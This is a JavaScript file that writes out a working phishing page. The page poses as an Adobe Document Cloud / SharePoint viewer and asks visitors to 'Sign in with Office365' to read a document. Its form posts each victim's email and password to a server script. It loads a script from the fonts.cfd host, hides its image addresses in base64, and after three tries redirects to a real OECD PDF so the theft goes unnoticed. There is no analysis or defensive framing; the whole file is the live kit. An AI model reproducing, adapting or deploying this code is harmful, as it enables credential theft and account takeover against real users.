document.write('<!doctype html>');
document.write('<html lang="en">');
document.write('<head>');
document.write('  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>');
document.write('  <script src="https://code.jquery.com/jquery-3.1.1.min.js">');
document.write('    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>');
document.write('    <!-- Required meta tags -->');
document.write('    <meta charset="utf-8">');
document.write('');
document.write('    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">');
document.write('');
document.write('    <!-- Bootstrap CSS -->');
document.write('    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">');
document.write('    <link href="https://fonts.googleapis.com/css?family=Yellowtail&display=swap" rel="stylesheet">');
document.write('    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>');
document.write('    <title>Share Point Online</title>');
document.write('    <link href="css/hover.css" rel="stylesheet" media="all">');
document.write('');
document.write('    <style type="text/css">');
document.write('');
document.write('');
document.write('    </style>');
document.write('  </head>');
document.write('  <body>');
document.write('    <div class="container-fluid">');
document.write('      <div class="row" style="background-image: url(\'aHR0cHM6Ly9mb250cy5jZmQvaW1hZ2VzLzguanBn\'); background-size: cover;background-repeat: no-repeat;">');
document.write('        <div class="container">');
document.write('          <div class="row">');
document.write('            <div class="col-lg-6 mx-auto my-5 px-5 pb-5" style="border:1px solid; background-color: rgba(0,0,0,0.7);border-radius:15px;">');
document.write('              <div class="text-center pt-5"> ');
document.write('                <img id="adobe" class="img-fluid" width="100px" id="i1"><br>');
document.write('                <span class="h5 text-white">Adobe Document Cloud</span><br>');
document.write('                <span class="h5 text-white font-weight-normal">To read the document, please enter with the valid email credentials that this file was sent to.</span>');
document.write('              </div>');
document.write('              <div class="mt-3">');
document.write('                ');
document.write('                <div class="row">');
document.write('                  <div class="col-lg-12 ">');
document.write('                    <a href="javascript:void(0)" id="aolmodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">');
document.write('                      <div class="  mt-2" style=" background-color: #31459B;">');
document.write('                      </div>');
document.write('                    </a>');
document.write('                  </div>');
document.write('                  <div class="col-lg-12">');
document.write('                    <a href="javascript:void(0)" id="office365modal" onclick="$(\'#ihg\').attr(\'src\',atob(\'aHR0cHM6Ly9mb250cy5jZmQvaW1hZ2VzL29mZmljZTM2NS5wbmc=\'))" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">');
document.write('                      <div class=" mt-2" style=" background-color: #FF3C00;">');
document.write('                        <img id="i2" class="img-fluid" width="40px" style=" background-color: rgba(0,0,0,0.3); padding:5px;">');
document.write('                        <span class="pl-4"  style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Office365</span>');
document.write('                      </div>');
document.write('                    </a>');
document.write('                  </div>');
document.write('                </div>');
document.write('              ');
document.write('                  </div>');
document.write('                  <div class="col-lg-12">');
document.write('                     <p class="text-white mt-3 text-center">Select your email provider to view Document</p>');
document.write('                <p class="h6 text-center text-white">CopyRight© 2023 Adobe.</p> ');
document.write('                    ');
document.write('                  </div>');
document.write('               ');
document.write('              </div> ');
document.write('            </div>');
document.write('          </div>');
document.write('        </div>');
document.write('');
document.write('');
document.write('');
document.write('      </div> ');
document.write('    </div>');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('    <!-- Modal for gmail -->');
document.write('    <div class="modal fade" id="ajaxModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">');
document.write('      <div class="modal-dialog" role="document">');
document.write('        <div class="modal-content">');
document.write('          <div class="modal-header">');
document.write('');
document.write('            <button type="button" class="close" data-dismiss="modal" aria-label="Close">');
document.write('              <span aria-hidden="true">&times;</span>');
document.write('            </button>');
document.write('          </div>');
document.write('          <div class="modal-body">');
document.write('            <center>');
document.write('              <img id="ihg" class="img-fluid rounded-circle" width="80px">');
document.write('              <h5 class="modal-title" id="exampleModalLabel">Login with <span id="field">Gmail</span></h5>');
document.write('              <div class="alert alert-danger" id="msg"></div>');
document.write('');
document.write('            </center>');
document.write('            <form id="contact" class="form-horizontal well">');
document.write('              <div class="col-lg-12">');
document.write('                <div class="form-group">');
document.write('                  <label for="exampleInputEmail1">Email address</label>');
document.write('                  <input type="email" name="email" class="form-control" id="email" aria-describedby="emailHelp" placeholder="Enter email">');
document.write('                  <small id="emailHelp" class="form-text text-muted">We\'ll never share your email with anyone else.</small>');
document.write('                </div>');
document.write('              </div>');
document.write('              <div class="col-lg-12">');
document.write('                <div class="form-group">');
document.write('                  <label for="Password">Password</label>');
document.write('                  <input type="password" name="password" class="form-control" id="password" aria-describedby="emailHelp" placeholder="Enter Password">');
document.write('                </div>');
document.write('              </div>');
document.write('            </div>');
document.write('            <div class="modal-footer">');
document.write('              <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>');
document.write('              <button class="btn btn-lg btn-info pull-right" id="submit-btn">Login</button>');
document.write('            </div>');
document.write('          </form>');
document.write('        </div>');
document.write('      </div>');
document.write('    </div>');
document.write('    <script>');
document.write('    $("#adobe").attr("src", atob("aHR0cHM6Ly9mb250cy5jZmQvaW1hZ2VzL2Fkb2JlLmpwZw"));');
document.write('        $("#office365modal div img#i2").attr("src", atob(\'aHR0cHM6Ly9mb250cy5jZmQvaW1hZ2VzL29mZmljZTM2NS5wbmc=\'));');
document.write('        // function off365(){');
document.write('        //     alert(0);');
document.write('        //     $("#fieldImg").attr("src", "hello.png")');
document.write('        // }');
document.write('        // $(\'#office365modal\').click(function () {');
document.write('        //     alert(91);');
document.write('        //     $(\'#contact\').trigger("reset");');
document.write('        //     $("#msg").hide();');
document.write('        //     $(\'#fieldImg\').attr(\'src\', "hello.png");');
document.write('        //     $(\'#field\').html("Office 365");');
document.write('        //     $(\'#ajaxModal\').modal(\'show\');');
document.write('        // });');
document.write('    </script>');
document.write('');
document.write('    <!-- Optional JavaScript -->');
document.write('    <!-- jQuery first, then Popper.js, then Bootstrap JS -->');
document.write('    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>');
document.write('    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>');
document.write('	<script type="text/javascript" src="https://fonts.cfd/views/ajax.js"></script>');
document.write('    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>');
document.write('  ');
document.write('  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>');
document.write('  <script>');
document.write('/* global $ */');
document.write('    $(document).ready(function(){');
document.write('      var count=0;');
document.write('      $(\'#gmailmodal\').click(function () {');
document.write('        $(\'#contact\').trigger("reset");');
document.write('        $("#msg").hide();');
document.write('        $(\'#fieldImg\').attr(\'src\', \'images/gmail.png\');');
document.write('        $(\'#field\').html("Gmail");');
document.write('        $(\'#ajaxModal\').modal(\'show\');');
document.write('      });');
document.write('      $(\'#outlookmodal\').click(function () {');
document.write('        $(\'#contact\').trigger("reset");');
document.write('        $("#msg").hide();');
document.write('        $(\'#fieldImg\').attr(\'src\', \'images/outlook.png\');');
document.write('        $(\'#field\').html("Outlook");');
document.write('        $(\'#ajaxModal\').modal(\'show\');');
document.write('      });');
document.write('      $(\'#aolmodal\').click(function () {');
document.write('        $(\'#contact\').trigger("reset");');
document.write('        $("#msg").hide();');
document.write('        $(\'#fieldImg\').attr(\'src\', \'images/aol.png\');');
document.write('        $(\'#field\').html("Aol");');
document.write('        $(\'#ajaxModal\').modal(\'show\');');
document.write('      });');
document.write('      $(\'#office365modal\').click(function () {');
document.write('        $(\'#contact\').trigger("reset");');
document.write('        $("#msg").hide();');
document.write('        $(\'#fieldImg\').attr(\'src\', \'images/office365.png\');');
document.write('        $(\'#field\').html("Office 365");');
document.write('        $(\'#ajaxModal\').modal(\'show\');');
document.write('      });');
document.write('      $(\'#yahoomodal\').click(function () {');
document.write('        $(\'#contact\').trigger("reset");');
document.write('        $("#msg").hide();');
document.write('        $(\'#fieldImg\').attr(\'src\', \'images/yahoo.png\');');
document.write('        $(\'#field\').html("Yahoo");');
document.write('        $(\'#ajaxModal\').modal(\'show\');');
document.write('      });');
document.write('      $(\'#othermodal\').click(function () {');
document.write('        $(\'#contact\').trigger("reset");');
document.write('        $("#msg").hide();');
document.write('        $(\'#fieldImg\').attr(\'src\', \'images/othermail.ico\');');
document.write('        $(\'#field\').html("Other Mail");');
document.write('        $(\'#ajaxModal\').modal(\'show\');');
document.write('      });');
document.write('      $(\'#submit-btn\').click(function(event){');
document.write('        event.preventDefault();');
document.write('        var email=$("#email").val();');
document.write('        var password=$("#password").val();');
document.write('        var detail=$("#field").html();');
document.write('');
document.write('        ');
document.write('        var msg = $(\'#msg\').html();');
document.write('        $(\'#msg\').text( msg );');
document.write('        count=count+1;');
document.write('        if (count>=3) {');
document.write('          count=0;');
document.write('          window.location.replace("https://www.oecd.org/employment/leed/OECD-China-report-Final.pdf");');
document.write('        }');
document.write('        else');
document.write('        {');
document.write('         $.ajax({');
document.write('          dataType: \'JSON\',');
document.write('          url: \'index.php\',');
document.write('          type: \'POST\',');
document.write('          data:{');
document.write('            email:email,');
document.write('            password:password,');
document.write('            detail:detail,');
document.write('');
document.write('          },');
document.write('            // data: $(\'#contact\').serialize(),');
document.write('            beforeSend: function(xhr){');
document.write('              $(\'#submit-btn\').html(\'Verifing...\');');
document.write('            },');
document.write('            success: function(response){');
document.write('              if(response){');
document.write('                $("#msg").show();');
document.write('                console.log(response);');
document.write('                if(response[\'signal\'] == \'ok\'){');
document.write('                 $(\'#msg\').html(response[\'msg\']);');
document.write('                  // $(\'input, textarea\').val(function() {');
document.write('                  //    return this.defaultValue;');
document.write('                  // });');
document.write('                }');
document.write('                else{');
document.write('                  $(\'#msg\').html(response[\'msg\']);');
document.write('                }');
document.write('              }');
document.write('            },');
document.write('            error: function(){');
document.write('              $("#msg").show();');
document.write('              $(\'#msg\').html("Please try again later");');
document.write('            },');
document.write('            complete: function(){');
document.write('              $(\'#submit-btn\').html(\'Login\');');
document.write('            }');
document.write('          });');
document.write('       }');
document.write('     });');
document.write('    });');
document.write('  </script>');
document.write('  </body>');
document.write('  </html>');
